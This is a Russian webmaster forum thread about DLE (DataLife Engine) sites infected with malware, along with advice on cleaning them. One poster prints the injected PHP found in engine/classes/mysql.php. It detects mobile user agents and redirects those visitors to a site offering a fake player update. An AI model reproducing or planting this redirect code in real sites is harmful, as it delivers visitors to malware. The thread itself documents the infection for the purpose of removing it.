Вирус на ДЛЕ сайтах
Страницы: 1 2 След.
[ Закрыто ] Вирус на ДЛЕ сайтах
Здравствуйте. Несколько моих сайтов на ДЛЕ заразились вирусом. Не могу точно определить, что за вирус и как с ним разобраться.
Во первых когда захожу на сайт с планшета на андроиде, меня редиректит на сайт opera-news-update.ru, где понятное дело мне предлагают обновить "Flow Player".

Во вторых на сайты реагирует антивирус ЕСЕТ, вердикт - вирус scrinject.b.gen, яша уже тоже заметил вирус на одном сайте, его вердикт - поведенческий анализ.

Кто знает, как исправить, помогите пожалуйста!
Дмитрий Димбровский, давайте в личку поподробнее
Открой свой магазин за 5 минут, их товары, их обслуживание, с тебя только клиенты >>> РЕГИСТРАЦИЯ <<<
Скрин выплат по запросу.
Рефералам помощь.
Дмитрий Димбровский, чистить все все файлы. Обновить двиг до 9.7 минимум + поставить патч безопасности
Не насиловать мозг. 
Самое безболезненное - перезалить поверх имеющихся (с заменой файлов)  файлы движка. 
Если не поможет (что маловероятно) искать проблему в шаблоне.
Цитата
mozambik пишет:
искать проблему в шаблоне
нет у него проблемы в шаблоне, страницы чистые, редиректит изнутри, но хеатсесс тоже чистый
Переустановите движок, восстановите файлы которые нужны для корректной работы сайта, енджи пхп оптионс и тп.  Я так чистил.
в  dbconfig.php или config.php была ведь тема уже
бр бр бр
Я переустанавливал, но у меня были бэкапы файлов и бд, обязательно делайте бэкапы.
Цитата
TEJlO11 пишет:
в dbconfig.php или config.php была ведь тема уже
там чисто
Если на хостинге не один домен, то они все будут редиректить если у основного домена в хеатсесс редирект засел. Я так тоже мучился, еле нашел причину
Обнови движок, как писали выше. И не медли с этим, я успел АГС получить пока разбирался с этой бодягой.
Все разобрался... smile:)

И так редирект мобильных устройств на сайт opera-news-update.ru, где понятное дело предлагается скачать вирусное приложение!

Чтобы отыскать вирус я юзнул тотал командер и сразу нашел ссылку на сайт вредитель.

Путь к зараженному файлу - /engine/classes/mysql.php
Сам код вируса выглядит вот так:

Код
$useragent=$_SERVER['HTTP_USER_AGENT'];
if(preg_match('/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge|maemo|midp|mmp|operam(ob|in)i|palm(os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows(ce|phone)|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|awa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r|s)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(i|ip)|hs\-c|ht(c(\-||_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(|\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(|\/)|klon|kpt|kwc\-|kyo(c|k)|le(no|xi)|lg(g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-||o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|)|webc|whit|wi(g|nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i',substr($useragent,0,4))){
header("Location: http://opera-news-update.ru/s/11011"); 
exit; 
}
п.с.
Всем большое спасибо за ответы. Отдельное спасибо Алексей SP, за его поддержку и дельные советы!
Не понимаю!Странные люди.
Не куда время девать? Ни своё, ни чужое?
Как минимум- пару часов на поиск и устранение.
Либо 5 минут на перезаливку файлов движка.
Эффект равнозначный.
Лёгкий путь нам ни к чему?!...smile:wall:
К тому же не факт, что обнаруженный код, единственный на сайте.
Изменено: mozambik - 19 Апреля 2013 21:42
А вы не подумали о том, что к примеру у меня сделаны куча хаков и модов? Они мне все нужны и я давно уже не помню в каких файлах я что то менял. Если я перезалью файлы движка, что будет с ними? Понятно что...
Цитата
mazesk пишет:
А вы не подумали о том, что к примеру у меня сделаны куча хаков и модов? Они мне все нужны и я давно уже не помню в каких файлах я что то менял. Если я перезалью файлы движка, что будет с ними? Понятно что...
Я, прежде чем что-либо написать, всегда думаю. Скажите, когда Вы устанавливаете хаки, моды - Вы вносите изменения в папку engine?
А именно эту папку требуется перезалить в первую очередь при обнаружении стороннего кода на сайте.
Речь не о переустановке движка, а о перезаливке файлов поверх существующих.
При перезаливке файлов движка, все сторонние файлы остаются не тронутыми
Вместо того, чтобы тратить время на поиск бяки, рациональнее  потратить время на устранение причин возникновения бяки.
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 2, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
13:23 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
13:16 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
08:26 Помогите! ОТКРЫЛАСЬ монетизация на ЮТЮБ! Но Как быть в 2024 с Adsense? 
08:23 Rotapost прикрыли! Чем пользоваться? 
17:53 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
12:39 2Index - быстрая индексация страниц сайта и обратных ссылок 
06:17 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
23:01 Скрипт обменника валют 
20:45 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
17:34 CryptoGraph — Анонимный обмен криптовалют без KYC и AML 
17:06 TETChange-Обменник криптовалют 
14:45 TIGER SMS — Виртуальные номера для SMS-верификации (опт и розница) 
14:43 Onechange.me — надежный обменник криптовалют и фиатных средств 
14:03 Quix Email - сервис почтовых активаций 
23:45 Точные прогнозы на футбол 
13:08 Бесплатный майнинг Tether (USDT) 
10:29 С юмором по жизни! 
16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру 
20:43 Добро пожаловать в цифровой мир... 
15:59 Про мясо 
23:09 ПП от PMS remote.team - 200$ за команду